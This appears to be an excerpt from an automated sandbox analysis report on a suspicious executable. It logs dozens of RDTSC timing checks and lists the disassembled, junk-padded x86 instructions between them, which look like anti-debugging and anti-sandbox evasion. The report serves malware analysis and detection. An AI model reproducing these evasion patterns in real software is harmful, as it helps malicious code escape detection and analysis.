Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7D283 second address: C7D2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnc 00007FF724EF309Ah 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 popad 0x00000014 push ecx 0x00000015 push edx 0x00000016 jmp 00007FF724EF309Eh 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF724EF30A6h 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7D6E7 second address: C7D6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FF724E96546h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7D978 second address: C7D97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C804F7 second address: C804FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C807AA second address: C807AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C807AF second address: C807B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C811E0 second address: C811E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C8124C second address: C81252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3FBC6 second address: C3FBCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C836AA second address: C836C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724E96552h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C8351B second address: C83539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF724EF30A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C836C5 second address: C836C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C83539 second address: C8354A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF724EF3096h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C836C9 second address: C83748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D3766h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF724E96548h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d pushad 0x0000002e push ebx 0x0000002f mov ecx, edx 0x00000031 pop edi 0x00000032 mov esi, edi 0x00000034 popad 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FF724E96548h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2141h], edi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jl 00007FF724E96546h 0x00000061 je 00007FF724E96546h 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C85329 second address: C85341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF724EF30A0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C87EA5 second address: C87EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C89C02 second address: C89C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C91C3F second address: C91C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C92B81 second address: C92B87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C87251 second address: C87255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C87C93 second address: C87CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF724EF3096h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C8DEFF second address: C8DF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C8EF95 second address: C8EF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C8FEF3 second address: C8FEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF724E96546h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C91E59 second address: C91E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C92D8D second address: C92D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C93A61 second address: C93A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C91E5F second address: C91EEC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF724E96546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D398Ah] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FF724E96548h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007FF724E96548h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov edi, 5C4E6A00h 0x0000005a mov eax, dword ptr [ebp+122D12E9h] 0x00000060 mov ebx, dword ptr [ebp+122D23DCh] 0x00000066 push FFFFFFFFh 0x00000068 mov dword ptr [ebp+1245526Bh], esi 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 push eax 0x00000073 pop eax 0x00000074 jnp 00007FF724E96546h 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C946A6 second address: C946AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C946AC second address: C946B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C946B2 second address: C946B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9666E second address: C96674 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C96733 second address: C96737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9493E second address: C94942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C959BA second address: C959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C977EC second address: C977F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C959BE second address: C959C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C977F1 second address: C97875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FF724E9654Eh 0x00000011 jmp 00007FF724E96550h 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FF724E96548h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FF724E96548h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D22DEh], esi 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 pop edi 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FF724E9654Bh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C97875 second address: C9787B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9787B second address: C97881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C97881 second address: C97893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FF724EF30A0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C97AC9 second address: C97ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C97ACD second address: C97AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99918 second address: C9991C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9991C second address: C9995A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D2183h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FF724EF3098h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov ebx, dword ptr [ebp+122D378Eh] 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9995A second address: C9995F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9995F second address: C99980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FF724EF3096h 0x00000009 jc 00007FF724EF3096h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FF724EF309Ch 0x0000001b jbe 00007FF724EF3096h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99980 second address: C9998A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99AE7 second address: C99AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99AF4 second address: C99AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99AF8 second address: C99AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C99AFE second address: C99B03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9BB37 second address: C9BB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9BB3B second address: C9BB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C9BB3F second address: C9BB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C38FD8 second address: C38FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 jl 00007FF724E9654Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CA3A90 second address: CA3A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CA3BCA second address: CA3BE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jo 00007FF724E96546h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CA3BE0 second address: CA3BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CA87C6 second address: CA87E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CA8A26 second address: ACEB87 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF724EF309Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6EF5652Eh 0x00000011 pushad 0x00000012 movzx edx, bx 0x00000015 clc 0x00000016 popad 0x00000017 push dword ptr [ebp+122D10C5h] 0x0000001d cmc 0x0000001e call dword ptr [ebp+122D2085h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D2ACBh], edi 0x0000002b xor eax, eax 0x0000002d jmp 00007FF724EF309Ah 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 pushad 0x00000037 jne 00007FF724EF3097h 0x0000003d stc 0x0000003e sbb al, 0000002Fh 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D385Eh], eax 0x00000048 sub dword ptr [ebp+122D2ACBh], eax 0x0000004e mov esi, 0000003Ch 0x00000053 stc 0x00000054 pushad 0x00000055 mov esi, dword ptr [ebp+122D37CAh] 0x0000005b mov bx, 90B1h 0x0000005f popad 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jp 00007FF724EF309Ch 0x0000006a lodsw 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 or si, 8203h 0x00000077 mov ecx, 213B4807h 0x0000007c popad 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jmp 00007FF724EF30A7h 0x00000086 push eax 0x00000087 pushad 0x00000088 pushad 0x00000089 pushad 0x0000008a popad 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF774 second address: CAF778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF778 second address: CAF789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FF724EF3096h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF789 second address: CAF78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF78E second address: CAF7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Fh 0x00000007 push eax 0x00000008 jmp 00007FF724EF309Bh 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FF724EF30A2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF7C6 second address: CAF7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF724E96546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF724E96552h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAED10 second address: CAED2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CAF33B second address: CAF340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5F90 second address: CB5F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB4D0D second address: CB4D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FF724E96546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB4E99 second address: CB4EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FF724EF3096h 0x0000000c jmp 00007FF724EF30A1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB4EB6 second address: CB4EC5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF724E96546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB4EC5 second address: CB4ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5041 second address: CB5048 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51B2 second address: CB51DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF724EF309Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FF724EF30A2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51DB second address: CB51E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51E1 second address: CB51E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51E5 second address: CB51E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51E9 second address: CB51F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF724EF3096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB51F8 second address: CB51FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5385 second address: CB5389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5389 second address: CB5395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF724E96546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5395 second address: CB539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5612 second address: CB561A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB590B second address: CB5910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
